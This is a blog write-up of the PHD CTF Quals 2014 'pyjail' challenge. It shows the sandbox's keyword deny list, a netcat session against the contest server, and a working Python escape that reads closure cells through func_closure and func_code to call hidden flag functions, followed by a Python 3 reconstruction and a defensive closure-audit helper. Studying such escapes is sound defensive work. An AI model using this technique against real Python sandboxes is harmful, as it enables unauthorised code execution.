A disturbing lack of taste

27 Jan 2014

PHD CTF Quals 2014 – pyjail

The task gives us a Python sandbox to escape. We aren't allowed to use any of the builtin functions, and the following words are forbidden: (?:__|import|globals|locals|exec|eval|join|format|replace|translate|try|except|with|content|frame|back)

We also have a limited charset:  \n\r0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ(),.:;<=>[]_{}

Inside the sandbox() function there are two functions, we_must_be_sure_flag_part1_is_ready and we_must_be_sure_flag_part2_is_ready, each of which copies its part of the flag into the FLAG variable. The flag is printed only if FLAG != part1_of_flag. In the divider function we find that, to get the complete flag, we need int(v1) / int(v2) == 13.37 (hard, huh?). To exploit this we used the divider function, which is passed into our context during the eval of our input, and called we_must_be_sure_flag_part1_is_ready() and we_must_be_sure_flag_part2_is_ready() through its data model attribute "func_closure" and the closure cells it holds.

Exploiting code:

root@kaiman:/home/nms/phd$ nc 195.133.87.177 1337
leetleetleetleet
Welcome to pyjail!

Try to get the flag!
Use ctrl+D or --- to submit your code

def get_cell_value(cell):
    return type(lambda: 0)(
        (lambda x: lambda: x)(0).func_code, {}, None, None, (cell,)
    )()
print get_cell_value(div.func_closure[8])()
print get_cell_value(div.func_closure[9])()
---
None
None
Flag is 7hE_0w15_4R3_n07_wh47_7h3Y_533m--7hEr3_15_4_m4n_1n_a_5m111n9_649
root@kaiman:/home/nms/phd$
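Why the filter did not help, as an added example (not code from the original post or the challenge): Python 2 exposes a function's closure and code object as func_closure and func_code, which contain no double underscore, and the "content" rule only blocks the direct cell_contents read that get_cell_value replaces. The sketch below uses the Python 3 spellings (__closure__, __code__) on a constructed stand-in for the sandbox; make_div, part1_ready, part2_ready, closure_exposure and run_untrusted are hypothetical names. closure_exposure is the audit a defender can run on any callable before handing it to untrusted code.

```python
import types

def make_div():
    # Constructed stand-in for the challenge's sandbox(); all names are hypothetical.
    flag = []
    def part1_ready():
        flag.append("part1")
    def part2_ready():
        flag.append("part2")
    def div(v1, v2):
        # Integer division can never equal 13.37, so this branch is dead code.
        if int(v1) // int(v2) == 13.37:
            part1_ready()
            part2_ready()
        return int(v1) // int(v2)
    return div, flag

def get_cell_value(cell):
    # The page's trick in Python 3 spelling: reuse the code object of a lambda
    # with one free variable and bind that free variable to `cell`.
    template = (lambda x: lambda: x)(0)
    return types.FunctionType(template.__code__, {}, None, None, (cell,))()

def closure_exposure(func):
    # Audit helper: every object reachable from func through its closure cells,
    # keyed by the free variable name it is bound to.
    cells = func.__closure__ or ()
    return dict(zip(func.__code__.co_freevars, (c.cell_contents for c in cells)))

def run_untrusted(source, api):
    # Empty builtins, as in the challenge; the only name handed in is `div`.
    # Attribute access on `div` still works, so its cells stay reachable.
    return eval(source, {"__builtins__": {}}, {"div": api})

if __name__ == "__main__":
    div, flag = make_div()
    print(sorted(closure_exposure(div)))       # names div can reach
    for cell in run_untrusted("div.__closure__", div):
        get_cell_value(cell)()                 # helpers run without the 13.37 check
    print(sorted(flag))
```

Any callable whose closure_exposure result is non-empty gives the sandboxed code a path to those objects, regardless of which builtins were removed.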

Razor4x
